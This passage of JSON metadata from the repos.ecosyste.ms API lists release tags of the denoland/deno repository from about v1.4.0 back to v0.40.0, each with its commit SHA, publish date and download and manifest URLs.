pi/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.0/manifests"},{"name":"std/0.69.0","sha":"b3fa81f867f933df41f274bd8eec10dddf1b1b28","kind":"commit","published_at":"2020-09-13T14:35:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.69.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.69.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.69.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.69.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.69.0/manifests"},{"name":"v1.3.3","sha":"a14b3c9e30a1b18f70519eac03be5a4648b65036","kind":"commit","published_at":"2020-09-04T16:15:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.3/manifests"},{"name":"std/0.68.0","sha":"a14b3c9e30a1b18f70519eac03be5a4648b65036","kind":"commit","published_at":"2020-09-04T16:15:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.68.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.68.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.68.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.68.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.68.0/manifests"},{"name":"v1.3.2","sha":"ac705b793612db6cc11b13270907e216e07460b3","kind":"commit","published_at":"2020-08-29T13:53:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.2/manifests"},{"name":"std/0.67.0","sha":"ac705b793612db6cc11b13270907e216e07460b3","kind":"commit","published_at":"2020-08-29T13:53:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.67.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.67.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.67.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.67.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.67.0/manifests"},{"name":"v1.3.1","sha":"999e5cf3d44ba41d988f0f3b4f94439a3b794bdc","kind":"commit","published_at":"2020-08-21T16:11:33.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.1/manifests"},{"name":"std/0.66.0","sha":"999e5cf3d44ba41d988f0f3b4f94439a3b794bdc","kind":"commit","published_at":"2020-08-21T16:11:33.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.66.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.66.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.66.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.66.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.66.0/manifests"},{"name":"v1.3.0","sha":"b38c3132768e0f5132763db9c8fdc2a4a9490bde","kind":"commit","published_at":"2020-08-13T16:10:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.0/manifests"},{"name":"std/0.65.0","sha":"b38c3132768e0f5132763db9c8fdc2a4a9490bde","kind":"commit","published_at":"2020-08-13T16:10:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.65.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.65.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.65.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.65.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.65.0/manifests"},{"name":"v1.2.3","sha":"92a173bca618cf6ef1e54c08deee61ba617491b9","kind":"commit","published_at":"2020-08-08T22:59:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.3/manifests"},{"name":"std/0.64.0","sha":"92a173bca618cf6ef1e54c08deee61ba617491b9","kind":"commit","published_at":"2020-08-08T22:59:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.64.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.64.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.64.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.64.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.64.0/manifests"},{"name":"v1.2.2","sha":"7446230e6b39a0d3ce70b8fffbed3ebc63e8c762","kind":"commit","published_at":"2020-07-31T19:14:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.2/manifests"},{"name":"std/0.63.0","sha":"7446230e6b39a0d3ce70b8fffbed3ebc63e8c762","kind":"commit","published_at":"2020-07-31T19:14:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.63.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.63.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.63.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.63.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.63.0/manifests"},{"name":"v1.2.1","sha":"25a0ad3e16e767d58b1315e9d12a236ea36c5998","kind":"commit","published_at":"2020-07-24T10:32:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.1/manifests"},{"name":"std/0.62.0","sha":"25a0ad3e16e767d58b1315e9d12a236ea36c5998","kind":"commit","published_at":"2020-07-24T10:32:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.62.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.62.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.62.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.62.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.62.0/manifests"},{"name":"v1.2.0","sha":"6af5149ea3d9b0accf7122073abbf852e355846f","kind":"commit","published_at":"2020-07-13T17:00:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.0/manifests"},{"name":"std/0.61.0","sha":"6af5149ea3d9b0accf7122073abbf852e355846f","kind":"commit","published_at":"2020-07-13T17:00:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.61.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.61.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.61.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.61.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.61.0/manifests"},{"name":"v1.1.3","sha":"be07aaed84946a13ec514c39606e2030e47af73f","kind":"commit","published_at":"2020-07-03T19:35:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.3/manifests"},{"name":"std/0.60.0","sha":"be07aaed84946a13ec514c39606e2030e47af73f","kind":"commit","published_at":"2020-07-03T19:35:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.60.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.60.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.60.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.60.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.60.0/manifests"},{"name":"v1.1.2","sha":"5bc130be2722fe54d42004cc48536b390437ede3","kind":"commit","published_at":"2020-06-26T21:45:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.2/manifests"},{"name":"std/0.59.0","sha":"5bc130be2722fe54d42004cc48536b390437ede3","kind":"commit","published_at":"2020-06-26T21:45:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.59.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.59.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.59.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.59.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.59.0/manifests"},{"name":"v1.1.1","sha":"bdf2d26ba1879b2ebeffd4b3a52e23e9254d4f05","kind":"commit","published_at":"2020-06-19T18:48:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.1/manifests"},{"name":"std/0.58.0","sha":"bdf2d26ba1879b2ebeffd4b3a52e23e9254d4f05","kind":"commit","published_at":"2020-06-19T18:48:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.58.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.58.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.58.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.58.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.58.0/manifests"},{"name":"v1.1.0","sha":"7d41bacfba6a3557066345ecd282f0d83e4a4381","kind":"commit","published_at":"2020-06-12T16:43:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.0/manifests"},{"name":"std/0.57.0","sha":"7d41bacfba6a3557066345ecd282f0d83e4a4381","kind":"commit","published_at":"2020-06-12T16:43:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.57.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.57.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.57.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.57.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.57.0/manifests"},{"name":"v1.0.5","sha":"515d19d901e7e5dbc04670807a2bd1cea237e9e8","kind":"commit","published_at":"2020-06-03T16:52:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.5/manifests"},{"name":"std/0.56.0","sha":"515d19d901e7e5dbc04670807a2bd1cea237e9e8","kind":"commit","published_at":"2020-06-03T16:52:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.56.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.56.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.56.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.56.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.56.0/manifests"},{"name":"v1.0.4","sha":"9c59a4b18c0aac3699d210c1f05f152651ddca28","kind":"commit","published_at":"2020-06-02T13:48:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.4/manifests"},{"name":"std/0.55.0","sha":"9c59a4b18c0aac3699d210c1f05f152651ddca28","kind":"commit","published_at":"2020-06-02T13:48:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.55.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.55.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.55.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.55.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.55.0/manifests"},{"name":"v1.0.3","sha":"106b00173806e088472e123d04fdc8d260c3820d","kind":"commit","published_at":"2020-05-29T16:48:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.3/manifests"},{"name":"std/0.54.0","sha":"106b00173806e088472e123d04fdc8d260c3820d","kind":"commit","published_at":"2020-05-29T16:48:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.54.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.54.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.54.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.54.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.54.0/manifests"},{"name":"std/0.53.0","sha":"526c9196e23af34d1ecd424d09c99c7003c33844","kind":"commit","published_at":"2020-05-22T18:00:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.53.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.53.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.53.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.53.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.53.0/manifests"},{"name":"v1.0.2","sha":"526c9196e23af34d1ecd424d09c99c7003c33844","kind":"commit","published_at":"2020-05-22T18:00:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.2/manifests"},{"name":"v1.0.1","sha":"49dda23f6b936f21de2a3de4be39771f30ddd6e9","kind":"commit","published_at":"2020-05-20T16:40:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.1/manifests"},{"name":"std/0.52.0","sha":"49dda23f6b936f21de2a3de4be39771f30ddd6e9","kind":"commit","published_at":"2020-05-20T16:40:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.52.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.52.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.52.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.52.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.52.0/manifests"},{"name":"std/0.51.0","sha":"c474d383543708fc636c06dd2e4a9100495f45c5","kind":"commit","published_at":"2020-05-14T11:45:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.51.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.51.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.51.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.51.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.51.0/manifests"},{"name":"v1.0.0","sha":"55d2c6bd103879263c115fa5697f3cf3101158f4","kind":"commit","published_at":"2020-05-13T22:07:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0/manifests"},{"name":"v1.0.0-rc3","sha":"35e8bc8de65b523e082d446dc25f114ed81264a8","kind":"commit","published_at":"2020-05-12T12:33:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0-rc3","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0-rc3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0-rc3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc3/manifests"},{"name":"v1.0.0-rc2","sha":"d8f5b37218715bbc624eb53dd4b7409867b2c803","kind":"commit","published_at":"2020-05-09T19:37:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0-rc2","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0-rc2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0-rc2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc2/manifests"},{"name":"std/0.50.0","sha":"d5dd5ae87d7598643a46f27fa4a11b2a85d42be8","kind":"commit","published_at":"2020-05-09T13:15:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.50.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.50.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.50.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.50.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.50.0/manifests"},{"name":"v1.0.0-rc1","sha":"5f67a202ff59f25ea183c261f664a6db06407e17","kind":"commit","published_at":"2020-05-04T19:46:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0-rc1","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc1/manifests"},{"name":"v0.42.0","sha":"f92bb9cf4de6ed4b6a84a14775e0dbe4ed45291a","kind":"commit","published_at":"2020-04-29T21:04:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.42.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.42.0/manifests"},{"name":"std/0.42.0","sha":"f92bb9cf4de6ed4b6a84a14775e0dbe4ed45291a","kind":"commit","published_at":"2020-04-29T21:04:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.42.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.42.0/manifests"},{"name":"v0.41.0","sha":"00fa4858b071739c76965e3c9ae096f2084d701b","kind":"commit","published_at":"2020-04-16T14:47:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.41.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.41.0/manifests"},{"name":"std/0.41.0","sha":"00fa4858b071739c76965e3c9ae096f2084d701b","kind":"commit","published_at":"2020-04-16T14:47:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.41.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.41.0/manifests"},{"name":"v0.40.0","sha":"0cf4ac91e6917b76c00d3d4b790e9fefc4dc5323","kind":"commit","published_at":"2020-04-08T18:59:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.40.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.40.0/manifests"},{"name":"std/0.40.0","sha":"0cf4ac91e6917b76c00d3d4b790e9fefc4dc5323","kind":"commit","published_at":"2020-04-08T18:59:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.40.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F